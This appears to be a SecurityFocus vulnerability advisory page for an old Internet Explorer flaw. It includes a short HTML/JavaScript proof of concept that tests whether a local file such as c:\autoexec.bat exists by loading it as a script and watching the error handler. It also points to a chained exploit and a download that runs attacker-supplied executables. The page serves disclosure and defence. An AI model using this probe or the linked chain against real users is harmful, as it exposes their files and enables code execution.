Microsoft Internet Explorer JavaScript Local File Enumeration Vulnerability

The following example was submitted by Tom Micklovitch <h_bugtraq@yahoo.com>:

<html>
<head>
<script language="javascript">
<!--
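// Set to true once the onerror handler has fired for the local file.
var fileExists = false;

// Runs as the window.onerror handler (assigned below).
function yes()
{
alert("the file exists.");
fileExists = true;
}

// Runs as the window.onload handler; reports absence only if yes() never ran.
function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no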
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>


Liu Die Yu has developed a proof of concept exploit to demonstrate arbitrary code execution using a combination of unpatched Internet Explorer vulnerabilities. Successful exploitation of these vulnerabilities in combination results in the execution of a cached executable file supplied by an attacker. The issues known to be exploited in combination with the issue described in this BID are described in the following BIDs:

BID 8980 - Microsoft Internet Explorer Double Slash Cache Zone Bypass Vulnerability
BID 8886 - Microsoft Internet Explorer Local Resource Reference Vulnerability
BID 8577 - Multiple Microsoft Internet Explorer Script Execution Vulnerabilities

The exploit can be obtained by visiting the following demo page provided by Liu Die Yu or by downloading execdror5-Demo.zip below.

http://www.safecenter.net/UMBRELLAWEBV4/execdror5/execdror5-MyPage.htm

Copyright 2010, SecurityFocus